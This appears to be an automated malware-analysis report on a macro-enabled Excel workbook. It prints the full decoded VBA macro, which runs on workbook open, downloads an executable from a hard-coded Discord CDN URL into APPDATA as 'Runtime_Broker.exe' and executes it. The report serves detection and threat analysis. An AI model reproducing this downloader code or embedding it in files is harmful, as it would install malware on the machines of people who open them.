Risk Score: 98 (MALICIOUS)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1105 Ingress Tool Transfer
The Workbook_Open macro in the VBA script calls a function that downloads a file from the hard-coded URL (via URLDownloadToFileW) and saves it to the user's APPDATA directory as 'Runtime_Broker.exe'. The downloaded file is then executed (via ShellExecuteW). This indicates downloader or dropper functionality.
Heuristics (5)

- VBA project inside OOXML (medium, 3 related findings) [OOXML_VBA]: Document contains a VBA project; VBA macros present.
- URLDownloadToFile in VBA (critical) [OLE_VBA_DOWNLOADURL]: URLDownloadToFile in VBA. Matched lines in script:

  ```vba
  Private Declare PtrSafe Function fDownloadUnicode Lib "urlmon" Alias "URLDownloadToFileW" (ByVal Value1 As LongLong, ByVal Value2 As LongLong, ByVal Value3 As LongLong, ByVal Value4 As LongLong, ByVal Value5 As LongLong) As LongLong
  Private Declare PtrSafe Function fExecuteUnicode Lib "shell32.dll" Alias "ShellExecuteW" (ByVal Value1 As LongLong, ByVal Value2 As LongLong, ByVal Value3 As LongLong, ByVal Value4 As LongLong, ByVal Value5 As LongLong, ByVal Value6 As LongLong) As LongLong
  ```

- Workbook_Open macro (low) [OLE_VBA_WBOPEN]: Workbook_Open macro. Matched lines in script:

  ```vba
  Private Sub Workbook_Open()
  Call YourSub
  ```

- Environ() call (env variable access) (low) [OLE_VBA_ENVIRON]: Environ() call (env variable access). Matched lines in script:

  ```vba
  sUrl = "https://cdn.discordapp.com/attachments/846783403826872354/846783966563926155/RuntimeBroker.exe"
  sPath = Environ("APPDATA") & "\Runtime_Broker.exe"
  Call fDownloadUnicode(0, StrPtr(sUrl), StrPtr(sPath), 0, 0)
  ```

- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: https://cdn.discordapp.com/attachments/846783403826872354/846783966563926155/RuntimeBroker.exe (referenced by macro)
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1528 bytes | 575eefd8e0fd850707881088dec0996b09d463c79e2297278c9767a4043de44d |
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 10240 bytes | 5a0be406ab06f0cad16493d86958c3280f102b33d4b788658fd235f0d8bdef99 |

Preview script (macros.bas, first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Declare PtrSafe Function fDownloadUnicode Lib "urlmon" Alias "URLDownloadToFileW" (ByVal Value1 As LongLong, ByVal Value2 As LongLong, ByVal Value3 As LongLong, ByVal Value4 As LongLong, ByVal Value5 As LongLong) As LongLong
Private Declare PtrSafe Function fExecuteUnicode Lib "shell32.dll" Alias "ShellExecuteW" (ByVal Value1 As LongLong, ByVal Value2 As LongLong, ByVal Value3 As LongLong, ByVal Value4 As LongLong, ByVal Value5 As LongLong, ByVal Value6 As LongLong) As LongLong
Private Sub Workbook_Open()
Call YourSub
End Sub
Private Sub YourSub()
Dim sUrl As String, sPath As String
sUrl = "https://cdn.discordapp.com/attachments/846783403826872354/846783966563926155/RuntimeBroker.exe"
sPath = Environ("APPDATA") & "\Runtime_Broker.exe"
Call fDownloadUnicode(0, StrPtr(sUrl), StrPtr(sPath), 0, 0)
Call fExecuteUnicode(0, StrPtr("Open"), StrPtr(sPath), 0, 0, 1)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```